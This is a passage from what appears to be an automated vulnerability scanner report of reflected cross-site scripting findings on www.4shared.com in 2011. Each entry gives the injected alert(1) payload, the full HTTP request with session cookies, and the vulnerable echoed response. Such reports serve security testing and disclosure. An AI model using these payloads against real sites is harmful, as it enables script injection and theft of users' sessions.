...[SNIP]...

1.327. http://www.4shared.com/enter.jsp [au parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of the au request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 was submitted in the au parameter. This input was echoed as 8fdd1"style="x:expression(alert(1))"f5d5aa7c370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /enter.jsp?sId=o2l1egVaZXKhvv6e&&fau=1&au=18fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9028A42901C0BD18B84955937C69399A.dc278; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:59 GMT
Connection: close
Content-Length: 33211


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or Si
...[SNIP]...
<input type="hidden" name="au" value="18fdd1"style="x:expression(alert(1))"f5d5aa7c370"/>
...[SNIP]...

1.328. http://www.4shared.com/faq.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /faq.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aae9"-alert(1)-"b86e0dc65d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /faq.jsp3aae9"-alert(1)-"b86e0dc65d2 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /faq.jsp3aae9&quot;-alert(1)-&quot;b86e0dc65d2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=66F969464FFE73FA334E29977412A1B7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36098


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/faq.jsp3aae9"-alert(1)-"b86e0dc65d2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.329. http://www.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4137e"-alert(1)-"30ce14ead11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4137e"-alert(1)-"30ce14ead11 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278

Response

HTTP/1.1 404 /favicon.ico4137e&quot;-alert(1)-&quot;30ce14ead11
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:51:35 GMT
Content-Length: 36133


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico4137e"-alert(1)-"30ce14ead11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.330. http://www.4shared.com/icons/16x16/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c041"-alert(1)-"b5aa33779a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons9c041"-alert(1)-"b5aa33779a/16x16/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons9c041&quot;-alert(1)-&quot;b5aa33779a/16x16/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=10E3680EA5CFAB4BF9BFADD373585B14.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:34 GMT
Connection: close
Content-Length: 36118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons9c041"-alert(1)-"b5aa33779a/16x16/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
v
...[SNIP]...

1.331. http://www.4shared.com/icons/16x16/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cc4"-alert(1)-"8ad53ce0672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x1634cc4"-alert(1)-"8ad53ce0672/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons/16x1634cc4&quot;-alert(1)-&quot;8ad53ce0672/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=888C0178FF1052C414FDAA58E2CE5F49.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:39 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x1634cc4"-alert(1)-"8ad53ce0672/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.332. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cedc"-alert(1)-"98d34b98a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images4cedc&quot;-alert(1)-&quot;98d34b98a53/blueBanner_plus.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.333. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aef3a"-alert(1)-"93d664da704 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/blueBanner_plus.gifaef3a&quot;-alert(1)-&quot;93d664da704
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.334. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/index-premium-features.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8493f"-alert(1)-"1139657276e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8493f"-alert(1)-"1139657276e/index-premium-features.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images8493f&quot;-alert(1)-&quot;1139657276e/index-premium-features.png
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:32 GMT
Content-Length: 36262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images8493f"-alert(1)-"1139657276e/index-premium-features.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.335. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/index-premium-features.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15de3"-alert(1)-"eb019ce0128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index-premium-features.png15de3"-alert(1)-"eb019ce0128 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/index-premium-features.png15de3&quot;-alert(1)-&quot;eb019ce0128
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:43 GMT
Content-Length: 36251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/index-premium-features.png15de3"-alert(1)-"eb019ce0128";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.336. http://www.4shared.com/images/spacer.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d78a"-alert(1)-"1ddd3f867cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3d78a&quot;-alert(1)-&quot;1ddd3f867cb/spacer.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36182


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.337. http://www.4shared.com/images/spacer.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce9c3"-alert(1)-"bd60f50799e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/spacer.gifce9c3"-alert(1)-"bd60f50799e HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/spacer.gifce9c3&quot;-alert(1)-&quot;bd60f50799e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/spacer.gifce9c3"-alert(1)-"bd60f50799e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.338. http://www.4shared.com/index.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e191f"-alert(1)-"6e354f00eec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.jspe191f"-alert(1)-"6e354f00eec HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /index.jspe191f&quot;-alert(1)-&quot;6e354f00eec
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77F2937069CCE87EA2E64BB3CD685400.dc278; Path=/
Content-Type: text/html;charset=UTF-8
